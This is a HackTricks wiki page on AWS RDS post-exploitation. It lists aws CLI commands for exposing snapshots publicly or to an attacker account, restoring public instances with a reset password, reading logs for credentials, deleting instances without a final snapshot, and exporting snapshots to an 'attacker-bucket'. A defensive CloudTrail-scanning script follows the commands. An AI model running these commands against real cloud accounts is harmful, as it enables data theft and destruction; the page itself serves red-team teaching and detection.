hacktricks-cloud/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
2024-12-12 19:35:48 +01:00

AWS - RDS Post Exploitation

{% hint style="success" %} Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

RDS

For more information check:

{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} aws-relational-database-rds-enum.md {% endcontent-ref %}

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

If the attacker has enough permissions, they could make a DB publicly accessible by creating a snapshot of the DB and then restoring a publicly accessible DB instance from that snapshot.

```bash
aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
    --db-instance-identifier <db-id> \
    --db-snapshot-identifier cloudgoat

# Get subnet groups & security groups (the restored instance will use the ones chosen below)
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

# Restore the snapshot as a new, publicly accessible instance
aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier "new-db-not-malicious" \
    --db-snapshot-identifier <snapshotId> \
    --db-subnet-group-name <db subnet group> \
    --publicly-accessible \
    --vpc-security-group-ids <ec2-security group>

# Reset the master password of the new instance (the original password is not known)
aws rds modify-db-instance \
    --db-instance-identifier "new-db-not-malicious" \
    --master-user-password 'Llaody2f6.123' \
    --apply-immediately

# Connect to the new DB after a few mins
```

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

An attacker with these permissions could create a snapshot of a DB and make it publicly available. Then, they could simply create a DB from that snapshot in their own account.

If the attacker doesn't have rds:CreateDBSnapshot, they can still make already existing snapshots public.

{% code overflow="wrap" %}

```bash
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to specific accounts (space-separated list):
## --values-to-add 111122223333 444455556666
```

{% endcode %}

rds:DownloadDBLogFilePortion

An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.

{% code overflow="wrap" %}

```bash
# Stream the most recent portion of the error log as text
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
```

{% endcode %}

Potential Impact: Access to sensitive information or unauthorized actions using leaked credentials.

rds:DeleteDBInstance

An attacker with this permission can DoS existing RDS instances by deleting them.

{% code overflow="wrap" %}

```bash
# Delete (skipping the final snapshot means no copy of the data is kept)
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
```

{% endcode %}

Potential impact: Deletion of existing RDS instances, and potential loss of data.

rds:StartExportTask

{% hint style="info" %} TODO: Test {% endhint %}

An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.

{% code overflow="wrap" %}

```bash
# The IAM role must be allowed to write to the destination bucket, and a KMS key is required to encrypt the export
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
```

{% endcode %}

Potential impact: Access to sensitive data in the exported snapshot.
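From the defender's side, every technique on this page leaves a distinctive RDS API call in CloudTrail. The following is an added example, not HackTricks code, that scans CloudTrail records for those calls (public or foreign-account snapshot sharing, publicly accessible restores, master password resets, deletions without a final snapshot, exports to an unexpected bucket). The `requestParameters` field names follow CloudTrail's lower-camel-case convention, and the trusted account and bucket allow-lists are assumptions.

```python
"""Flag CloudTrail records matching the RDS abuses described on this page.
Added example, not HackTricks code. Field names follow CloudTrail's
lower-camel-case requestParameters; the allow-lists are assumptions."""
TRUSTED_ACCOUNTS = {"111122223333"}            # accounts allowed to receive snapshots
TRUSTED_EXPORT_BUCKETS = {"corp-rds-exports"}  # assumed legitimate export target

def classify(event):
    """Return a finding string for one CloudTrail record, or None if benign."""
    if event.get("eventSource") != "rds.amazonaws.com":
        return None
    name, p = event.get("eventName"), event.get("requestParameters") or {}
    if name == "ModifyDBSnapshotAttribute" and p.get("attributeName") == "restore":
        added = set(p.get("valuesToAdd") or [])
        if "all" in added:                     # snapshot became public
            return "snapshot restore attribute set to all (public)"
        if added - TRUSTED_ACCOUNTS:           # shared with a foreign account
            return f"snapshot shared with accounts {sorted(added - TRUSTED_ACCOUNTS)}"
    if name == "RestoreDBInstanceFromDBSnapshot" and p.get("publiclyAccessible") is True:
        return "instance restored from snapshot as publicly accessible"
    if name == "ModifyDBInstance" and "masterUserPassword" in p:
        return "master user password changed"  # CloudTrail masks the value; the key's presence is the signal
    if name == "DeleteDBInstance" and p.get("skipFinalSnapshot") is True:
        return "instance deleted with SkipFinalSnapshot"
    if name == "StartExportTask" and p.get("s3BucketName") not in TRUSTED_EXPORT_BUCKETS:
        return f"snapshot exported to unexpected bucket {p.get('s3BucketName')!r}"
    return None

def scan(records):
    """Return (eventTime, eventName, finding) for every suspicious record, in order."""
    return [(r.get("eventTime", "?"), r["eventName"], f)
            for r in records if (f := classify(r))]

# Constructed sample records (not real CloudTrail output); T1..T5 stand in for timestamps.
RDS = "rds.amazonaws.com"
SAMPLE_EVENTS = [
    {"eventTime": "T1", "eventSource": RDS, "eventName": "CreateDBSnapshot",
     "requestParameters": {"dBSnapshotIdentifier": "cloudgoat"}},
    {"eventTime": "T2", "eventSource": RDS, "eventName": "ModifyDBSnapshotAttribute",
     "requestParameters": {"attributeName": "restore", "valuesToAdd": ["all"]}},
    {"eventTime": "T3", "eventSource": RDS, "eventName": "RestoreDBInstanceFromDBSnapshot",
     "requestParameters": {"dBInstanceIdentifier": "new-db-not-malicious", "publiclyAccessible": True}},
    {"eventTime": "T4", "eventSource": RDS, "eventName": "DeleteDBInstance",
     "requestParameters": {"dBInstanceIdentifier": "prod", "skipFinalSnapshot": False}},
    {"eventTime": "T5", "eventSource": RDS, "eventName": "StartExportTask",
     "requestParameters": {"s3BucketName": "attacker-bucket", "sourceArn": "arn:aws:rds:...:snapshot:x"}},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(" | ".join(hit))
```

Running it on the sample records flags T2, T3 and T5; the T4 deletion is not flagged because a final snapshot was taken.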
